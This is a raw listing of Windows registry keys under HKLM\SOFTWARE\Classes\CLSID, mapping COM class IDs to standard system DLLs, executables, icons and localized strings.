HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A29F9BD-86B3-4384-B25D-EF1FFE020266}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\WSDScanProxy.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A4B5474-4226-4D28-B4FC-369CC68A7211}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A556D98-CFEE-4D84-82A7-00377F939198}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A6C76BD-9A96-4FD9-930B-F60AF68F6388}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A860B80-3773-4DDE-85B4-E68C520A858C}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A88C858-7D0C-4549-9499-7DB05F0CB0BF}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ntshrui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0a9bbb1e-03ee-4201-9900-abbff56c9c6c}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0AC71593-60FC-4a6a-BF85-A0B93BCC3785}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\oobe\msoobeplugins.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0ADD8D9B-E3C3-43B5-BBCE-1E158E027A64}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\UserDataPlatformHelperUtil.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0af96ede-aebf-41ed-a1c8-cf7a685505b6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0AFACED1-E828-11D1-9187-B532F1E9575D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0AFACED1-E828-11D1-9187-B532F1E9575D}\shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0AFCCBA6-BF90-4A4E-8482-0AC960981F5B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0B124F8F-91F0-11D1-B8B5-006008059382}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\appwiz.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0B2C35D2-C8BC-4470-BFC0-D6BB1235E5CE}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\DATACLEN.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0b2c9183-c9fa-4c53-ae21-c900b0c39965}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SearchFolder.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0B4CD745-723E-4D23-B898-47BECD7F0DEF}\InprocServer32 (Default) REG_EXPAND_SZ %SYSTEMROOT%\System32\wbem\vpnclientpsprovider.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0B5A7836-4C16-4560-90B2-0F5DAF6D6D1B}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmcndmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0bdc6fc7-83e3-46a4-bfa0-1bc14dbf8b38}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\logoncontroller.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0bf754aa-c967-445c-ab3d-d8fda9bae7ef}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\stobject.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0BFCF7B7-E7B6-433a-B205-2904FCF040DD}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\appwiz.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0c0b25f5-e762-4004-96cd-00ffc1ecb5bf}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0C11C759-23B0-4731-8D48-5FE3EA62051F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0c194cb2-2959-4d14-8964-37fd3e48c32d}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0C1A0EF4-B44F-4179-BDDD-31C27DE7A6D1}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\InternetMailCsp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0C313C67-199B-4e68-884D-D36914E26EDD}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\provsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0c39a5cf-1a7a-40c8-ba74-8900e6df5fcd}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-117 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0c39a5cf-1a7a-40c8-ba74-8900e6df5fcd}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0C3B05FB-3498-40C3-9C03-4B22D735550C} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\rasdlg.dll,-361 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0C3B05FB-3498-40C3-9C03-4B22D735550C}\Elevation IconReference REG_EXPAND_SZ @%SystemRoot%\system32\rasdlg.dll,-562 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0C3B05FB-3498-40C3-9C03-4B22D735550C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\rasdlg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0C41D1E6-9D16-41ED-9CDD-D0665039857B}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\tcpipcfg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0C5672F9-3EDC-4b24-95B5-A6C54C0B79AD}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wiaaut.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0C657D21-CE8E-4D86-AEEB-63FFBC70846D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0c9ac398-8c78-4b4b-b8c6-675ed1b734a1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\netcorehc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0CA545C6-37AD-4A6C-BF92-9F7610067EF5} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\FirewallControlPanel.dll,-12122 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0CD069CF-AC9B-41F4-9571-3A95A62C36A1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0CD397F8-20A2-46F0-BAE8-952DEEEDA2C5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ConnectedAccountState.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0CD7A5C0-9F37-11CE-AE65-08002B2E1262}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\cabview.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0cdb500e-123f-4e98-b446-0f3eae3c7ebc}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\netcorehc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0CE7A4A6-03E8-4A60-9D15-282EF32EE7DA}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0CF07551-EEF2-420C-B5AB-7E4FEB2249CF}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AppxPackaging.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0CF32AA1-7571-11D0-93C4-00AA00A3DDEA}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\sysmon.ocx HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0CFAE939-931E-4305-8D05-8C76C254EB34}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Engines\SR\spsreng_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0D0E47ED-7220-411f-8F81-1118095DA5E7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\provsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0D41EBA2-17EA-4B0D-9172-DBD2AE0CC97A}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\srhelper.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0D45D530-764B-11d0-A1CA-00AA00C16E65}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\dsuiext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0D6417E3-866C-4959-9816-4BF5B85CDAD7}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Engines\SR\spsrx.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0D722F1A-9FCF-4E62-96D8-6DF8F01A26AA}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0D816B02-D487-44FB-8BD3-7EADB66604CA}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0d81ea0d-13bf-44b2-af1c-fcdf6be7927c}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0d9948a9-e79f-4a06-8784-c32583d034f2}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\CapabilityAccessHandlers.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0da7bfdf-c0a0-44eb-be82-b7a82c4721de} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\appwiz.cpl,-184 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0da7bfdf-c0a0-44eb-be82-b7a82c4721de}\Elevation IconReference REG_EXPAND_SZ @%SystemRoot%\system32\appwiz.cpl,-1507 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0da7bfdf-c0a0-44eb-be82-b7a82c4721de}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\appwiz.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0DB7E03F-FC29-4DC6-9020-FF41B59E513A}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-198 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0DB7E03F-FC29-4DC6-9020-FF41B59E513A}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0DBD7044-8EA5-4573-A924-FE8565CCE18F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0dbecec1-9eb3-4860-9c6f-ddbe86634575}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\msheif.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0DC1AB8B-A52D-4BA8-BD76-E2819386FB2F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0DD1B55E-2EB8-42E2-B8D0-F11594A29477}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0DF44EAA-FF21-4412-828E-260A8728E7F1} InfoTip REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-30348 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-32517 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0DF44EAA-FF21-4412-828E-260A8728E7F1}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-80 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0DF44EAA-FF21-4412-828E-260A8728E7F1}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Options_RunDLL 1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0e119e63-267a-4030-8c80-5b1972e0a456}\InProcHandler32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0E1487F2-9865-4CD5-B99A-9C5EB063A2BC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0E1EEFB2-E336-481C-B178-36261EC5A843}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\NaturalLanguage6.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0E21C2A5-88A5-408D-A3F4-480755678C61}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wlidprov.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0E25DC18-9F5E-48B1-80B3-D124E81B773B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecsext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0E32D9F9-10FB-4b90-8B24-826B07B084D0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\cscui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0e3be0d7-030e-4ca3-a911-d86e24ae0a3c}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\IME\IMETC\IMTCCFG.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0E5AAE11-A475-4c5b-AB00-C66DE400274E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0E5CBF21-D15F-11D0-8301-00AA005B4383}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0e6daa63-dd4e-47ce-bf9d-fdb72ece4a0d}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\fdprint.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0e971350-4039-4a03-85fe-4c210917c26d}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingMonitor.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0E9847B3-13E8-44E6-9659-2B60A140A573}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\DMWmiBridgeProv.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0eb06e8d-d00a-11da-a46c-0040f4b33241}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\TSErrRedir.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EEA25CC-4362-4a12-850B-86EE61B0D3EB}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EEF5FBE-18F3-478A-BD28-4899C2E90323}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f3079cc-f843-4c8e-9a5e-4af1e37b4c95}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\exsmime.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f3ed1f2-afdd-4b0c-b6d9-229c1bc58a08}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\netcorehc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F469577-F241-4632-941A-C592F64FC1C4}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\VoiceActivationManager.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F563B5F-8EE2-4516-BA0A-544DE058C75B}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\FileHistory.exe,-100 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F563B5F-8EE2-4516-BA0A-544DE058C75B}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\fhcleanup.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F6221DB-8EE7-450D-A28A-2898956004F2}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingMonitor.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F7434B6-59B6-4250-999E-D168D6AE4293}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\UIRibbon.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F7650EE-9AFA-47B4-9BE7-F74D9D3C41D7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F92030A-CBFD-4AB8-A164-FF5985547FF6}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f92ff8d-2f19-4b9a-b9dd-3efc2b3becec}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\audioeng.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0FA53099-5317-46AF-9376-9A04A4B550F9}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\audioeng.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0fafd998-c8e8-42a1-86d7-7c10c664a415}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.ui.picturepassword.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0FC988D4-C935-4b97-A973-46282EA175C8}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\StructuredQuery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0FDE5092-AA2A-11D1-A7D4-0000F87571E3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\GPEdit.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{102D1D13-BD88-435f-99C1-DE69F1886168}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\WLanConn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{103E1E59-66D1-4143-B772-8D846E96FEBF}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\LocationFramework.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{104846ab-42b1-4e38-a80d-136f78c3f258}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{10493933-661B-4083-9CE0-EFE48ADD0770}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1050489C-0702-493F-94AB-58A9C5BE620C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\WpcApi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{10898C3A-D2EB-483A-BC44-66BCCF03D6F4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Devices.HumanInterfaceDevice.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{10964DDD-6A53-4C60-917F-7B5723014344} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\SecurityHealthAgent.dll,-12001 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{10964DDD-6A53-4C60-917F-7B5723014344}\Elevation IconReference REG_EXPAND_SZ @%systemroot%\system32\SecurityHealthAgent.dll,-101 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{10A59D3A-E15C-44EC-B6C8-950E713DCA7D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\settingsync.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{10E59D21-3860-4ed8-BD52-883E116A892E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1108BE51-F58A-4CDA-BB99-7A0227D11D5E}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\fastprox.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11103421-354C-4CCA-A7A3-1AFF9A5B6701}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1123D0C1-886C-42C3-98E6-7109780E8BE2}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\SmartCardSimulator.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11275A82-5E5A-47fd-A01C-3683C12FB196}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfmp4srcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{114F5598-0B22-40A0-86A1-C83EA495ADBD}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{115e13cf-cfe8-4821-b0da-e06aa4d51426}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\RdpSaProxy.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{116F8D13-101E-4fa5-84D4-FF8279381935}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\StructuredQuery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11a25a1d-b9a3-4edd-af83-3b59adbed361}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11d162b6-1cea-4b4a-8037-2518ecd6554b}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11dbb47c-a525-400b-9e80-a54615a090c0} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-30309 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11dbb47c-a525-400b-9e80-a54615a090c0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1202DB60-1DAC-42C5-AED5-1ABDD432248E}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mobsync.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1206F5F1-0569-412C-8FEC-3204630DFB70} InfoTip REG_EXPAND_SZ @%SystemRoot%\system32\Vault.dll,-2#immutable1 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\Vault.dll,-1#immutable1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1206F5F1-0569-412C-8FEC-3204630DFB70}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\Vault.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1206F5F1-0569-412C-8FEC-3204630DFB70}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shdocvw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1206F5F1-0569-412C-8FEC-3204630DFB70}\Instance\InitPropertyBag ResourceDLL REG_EXPAND_SZ %SystemRoot%\system32\Vault.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{120CED89-3BF4-4173-A132-3CB406CF3231}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dsdmo.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{122EC645-CD7E-44D8-B186-2C8C20C3B50F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1249B20C-5DD0-44FE-B0B3-8F92C8E6D080}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{124E2045-8D63-4C23-B420-BBCD6A0ED61A}\InprocServer32 (Default) REG_EXPAND_SZ %SYSTEMROOT%\System32\wbem\qoswmi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{12518493-00B2-11d2-9FA5-9E3420524153}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{125B0F61-0EC3-4f07-9A49-AFB340D9E57F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\fhlisten.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1299CF18-C4F5-4B6A-BB0F-2299F0398E27}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\npmproxy.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{12C21EA7-2EB8-4B55-9249-AC243DA8C666} LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\DiagCpl.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{12C21EA7-2EB8-4B55-9249-AC243DA8C666}\Elevation IconReference REG_EXPAND_SZ @%Systemroot%\System32\DiagCpl.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{12C21EA7-2EB8-4B55-9249-AC243DA8C666}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shpafact.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{12D73610-A1C9-11D3-BC90-00C04F72DF9F}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{12DD4DBB-532B-4FCE-8653-74CDB9C8FE5A}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\audioeng.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{12fc5e89-5446-4a7c-ba46-207a29e2945d}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\hgcpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{130F6206-B21A-4B21-9D98-526B5AECC0BB}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSync.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{133eac4f-5891-4d04-bada-d84870380a80}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{135698D2-3A37-4d26-99DF-E2BB6AE3AC61}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dmintf.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1362ada1-eb60-456a-b6e1-118050db741b}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\CertEnroll.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13639463-00DB-4646-803D-528026140D88} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\wuapi.dll,-63520 